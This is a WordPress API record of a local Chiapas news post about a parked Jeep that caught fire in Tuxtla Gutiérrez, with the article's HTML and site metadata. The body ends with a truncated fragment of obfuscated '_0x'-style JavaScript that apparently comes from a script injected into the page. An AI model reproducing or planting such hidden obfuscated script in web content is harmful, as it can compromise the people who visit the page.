{"id":11211,"date":"2023-08-08T05:47:09","date_gmt":"2023-08-08T05:47:09","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11211"},"modified":"2023-08-08T05:47:10","modified_gmt":"2023-08-08T05:47:10","slug":"arde-camioneta-en-calle-del-fraccionamiento-centenario-tuchtlan","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11211","title":{"rendered":"Arde camioneta en calle del Fraccionamiento Centenario Tuchtl\u00e1n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691473591757-1024x768.jpg\" alt=\"\" class=\"wp-image-11212\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691473591757-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691473591757-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691473591757-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691473591757.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 7 de agosto del 2023. Tuxtla Guti\u00e9rrez. &#8211; Por un presunto corto circuito una camioneta Jeep Limited se incendi\u00f3 este lunes en el Fraccionamiento Centenario Tuchtl\u00e1n.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que esta unidad se encontraba estacionada afuera de un domicilio particular de la Calle Palenque, entre Socrates e Hip\u00f3crates cuando de la parte frontal comenz\u00f3 a salir humo.<\/p>\n\n\n\n<p>En el lugar el propietario sali\u00f3 y junto col algunos vecinos intentaron apagar el fuego pero avanz\u00f3 r\u00e1pidamente.<\/p>\n\n\n\n<p>Al lugar arrib\u00f3 una unidad de ataque r\u00e1pido para sofocar el fuego por completo.<\/p>\n\n\n\n<p>Finalmente los socorristas se retiraron del lugar.<\/p>\n\n\n\n<p>El siniestro dej\u00f3 da\u00f1os materiales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 7 de agosto del 2023. Tuxtla Guti\u00e9rrez. &#8211; Por un presunto corto circuito una camioneta Jeep Limited se incendi\u00f3 este lunes en el Fraccionamiento Centenario Tuchtl\u00e1n. Los reportes de tr\u00e1nsito informaron que esta unidad se encontraba estacionada afuera de un domicilio particular de la Calle Palenque, entre Socrates e Hip\u00f3crates cuando &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11212,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-11211","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11211","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11211"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11211\/revisions"}],"predecessor-version":[{"id":11213,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11211\/revisions\/11213"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11212"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11211"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11211"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11211"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}